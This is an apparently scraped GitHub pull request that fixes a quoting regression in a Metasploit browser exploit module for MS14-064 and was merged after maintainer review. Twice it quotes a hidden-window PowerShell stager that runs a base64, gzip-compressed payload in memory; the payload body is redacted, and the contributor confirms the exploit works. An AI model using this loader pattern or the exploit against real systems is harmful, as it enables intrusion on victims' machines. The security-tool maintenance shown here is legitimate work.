Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Regression fix: Disabling wrap_double_quotes #11842

Merged
merged 3 commits into from May 16, 2019

Conversation

Projects
None yet
4 participants
@pr4tik
Copy link
Contributor

commented May 16, 2019

This client side exploit stopped working in current MSF throws an error in client browser.As per the analysis its because of Powershell::wrap_double_quotes=true.
I have just Added "Powershell::wrap_double_quotes" as advance option to override Datastore value.

Error when Powershell::wrap_double_quotes value set to true.
shell.ShellExecute "powershell.exe", "-nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''**<REDEACTED>**''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"", "", "open", 0 end function

1_MSF_Output_error
2error
3 ViewSourece_error
error

Working POC

If the "Powershell::wrap_double_quotes" value is set to false this exploit works.
Working Payload
shell.ShellExecute "powershell.exe", "-nop -w hidden -noni -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''**<RECEACTED>**''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);", "", "open", 0 end function

Working
Working_exploit

I have tested this multiple times and it works

Regression fix: Disabling wrap_double_quotes
This client side exploit stopped working in current MSF throws an error in client browser.As per the analysis its because of Powershell::wrap_double_quotes=true. 
I have just Added "Powershell::wrap_double_quotes"  as advance option to override Datastore value.

@bcoles bcoles added bug module labels May 16, 2019

@bcoles

This comment has been minimized.

Copy link
Contributor

commented May 16, 2019

@bcoles

This comment has been minimized.

Copy link
Contributor

commented May 16, 2019

@bcoles

This comment has been minimized.

Copy link
Contributor

commented May 16, 2019

Thanks for the patch.

Is this the best way to fix it? @wvu-r7

@wvu-r7
Copy link
Contributor

left a comment

I would do something like this:

'DefaultOptions' => {'Powershell::wrap_double_quotes' => false}
Removed register_advanced_options
Added 'Powershell::wrap_double_quotes' => false in DefaultOptions.
@pr4tik

This comment has been minimized.

Copy link
Contributor Author

commented May 16, 2019

I would do something like this:

'DefaultOptions' => {'Powershell::wrap_double_quotes' => false}

I have modified the code.
However getting error in CI (travis-ci)

@wvu-r7 wvu-r7 self-assigned this May 16, 2019

@wvu-r7

wvu-r7 approved these changes May 16, 2019

Copy link
Contributor

left a comment

Build should pass now.

@wvu-r7 wvu-r7 merged commit 328b4fa into rapid7:master May 16, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wvu-r7 added a commit that referenced this pull request May 16, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented May 16, 2019

Release Notes

This changes Powershell::wrap_double_quotes to false in exploit/windows/browser/ms14_064_ole_code_execution in order to fix a regression in functionality.

msjenkins-r7 added a commit that referenced this pull request May 16, 2019

@gdavidson-r7 gdavidson-r7 added the rn-fix label May 29, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.